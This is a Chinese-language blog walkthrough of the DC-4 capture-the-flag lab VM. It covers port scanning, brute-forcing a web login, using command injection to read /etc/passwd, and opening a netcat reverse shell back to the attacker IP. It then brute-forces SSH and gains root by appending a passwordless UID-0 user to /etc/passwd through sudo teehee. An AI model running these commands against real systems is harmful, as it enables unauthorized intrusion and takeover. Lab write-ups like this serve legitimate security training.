一、信息收集
查询本机ip及目标靶机ip
本机ip:192.168.56.104,靶机ip利用nmap或arp-scan查看
![](https://i-blog.csdnimg.cn/blog_migrate/84f7952274d35f4c5a5fae44f93d1095.png)
靶机ip:192.168.56.113
收集靶机开放端口
输入nmap -sS -sV -T5 -A 192.168.56.113
![](https://i-blog.csdnimg.cn/blog_migrate/c01b1be52aeb8541f9345316e672dd28.png)
发现22和80端口,常用思路,查看靶机的web服务,然后找到对应的用户名和密码,利用此远程ssh,获取低权限,然后尝试进行提权操作
对应端口进行尝试
浏览靶机页面,发现了登录框
![](https://i-blog.csdnimg.cn/blog_migrate/1562a7af462e45ede94ddb3eeb6fa9ac.png)
尝试看是否存在弱口令,测试发现无,尝试是否存在注入,用bp进行抓包,将抓到的包发送Intruder进行爆破
![](https://i-blog.csdnimg.cn/blog_migrate/eb261fe5920cc211473f4b008fe86f7d.png)
![](https://i-blog.csdnimg.cn/blog_migrate/09c22f6c9d9610d2704adf5728424e55.png)
![](https://i-blog.csdnimg.cn/blog_migrate/9e2faddf873a2f4a4707afae5befc230.png)
二、Web渗透
爆破后得到用户名为admin,密码为happy,登陆后发现存在远程命令的漏洞,进行抓包分析
![](https://i-blog.csdnimg.cn/blog_migrate/d60dd782098b1b44115bc76bbff11c21.png)
![](https://i-blog.csdnimg.cn/blog_migrate/b79b7da3de297142f743d19aed682cfc.png)
![](https://i-blog.csdnimg.cn/blog_migrate/45c8bf365c25ac266b8abbbe60ef3eee.png)
![](https://i-blog.csdnimg.cn/blog_migrate/e35fed058d01885fd7f7548654af426b.png)
这里发现命令是利用+号代替空格,构造一下命令,查看一下/etc/passwd
cat+/etc/passwd
![](https://i-blog.csdnimg.cn/blog_migrate/39d0d74998df4869e6ea238a7e671a8e.png)
从这发现了有三个用户charles、Jim、sam
利用这个远程命令,向攻击机返回一个shell,输入nc+192.168.56.104+5555+-e+/bin/bash
然后kali终端开启监听,nc -vlp 5555
![](https://i-blog.csdnimg.cn/blog_migrate/f41c06b68fed319b597f94780939c958.png)
下一步就是常规操作了
python -c 'import pty;pty.spawn("/bin/bash")'
进行一波信息收集后在/home下找到了三个用户,同时在jim目录下找到了一个旧密码的文件,查看文件并将文件中的内容写入一个新的文本,后面进行爆破使用
![](https://i-blog.csdnimg.cn/blog_migrate/76bd8b49ec8f0e293e7e01cce6ad3590.png)
![](https://i-blog.csdnimg.cn/blog_migrate/d4e279fc1aba7e85aa3d767d54d15f22.png)
爆破出来,用户名jim,密码为jibril04,利用该用户进行ssh登录
![](https://i-blog.csdnimg.cn/blog_migrate/91d69553a5d204bfae9cb5eb4f7a17b3.png)
登陆成功,看到了一个mbox文件,查看后发现好像是类似于邮件一样,再没什么别的能用的信息了,到这一步,就得想办法去提权了,这个用户的权限小的可怜,开始看能不能找到有用的信息
经过一番搜索发现了之前charles的密码
![](https://i-blog.csdnimg.cn/blog_migrate/037003815e1ca2a61e43245cafbb8a15.png)
之前想看jim能不能进行提权,发现jim不可以运行
![](https://i-blog.csdnimg.cn/blog_migrate/3da17c4042646025fd0f8589010d62ee.png)
只能另开一个终端利用charles进行登录
![](https://i-blog.csdnimg.cn/blog_migrate/be89772bd166032f7e8da426424ad660.png)
![](https://i-blog.csdnimg.cn/blog_migrate/fd351d79969b9cd0d3042b34ce89d2a4.png)
发现存在teehee可以提示为root,这个东西是啥还真不知道
![](https://i-blog.csdnimg.cn/blog_migrate/1c595bfc1c400a8d50a44c60f723fa07.png)
相关的英文可以自己去翻译,-a应该可以看懂吧,意思是可以在你给定的文件中添加,不能复写,那这就很简单了,我可以在/etc/passwd中,弄个简单的,直接提权
echo "xiaoli::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
然后直接su xiaoli,没有密码,直接成为root,完事就可以进到/root,cat flag.txt了
![](https://i-blog.csdnimg.cn/blog_migrate/0c7435372d3832eb4b74807cd6fb86aa.png)
到此,DC系列的第4个靶机就结束了,还是比较简单的,可以巩固一些操作。
每天努力一点点,积累一点点,将碎片化的知识积累起来才不会白学!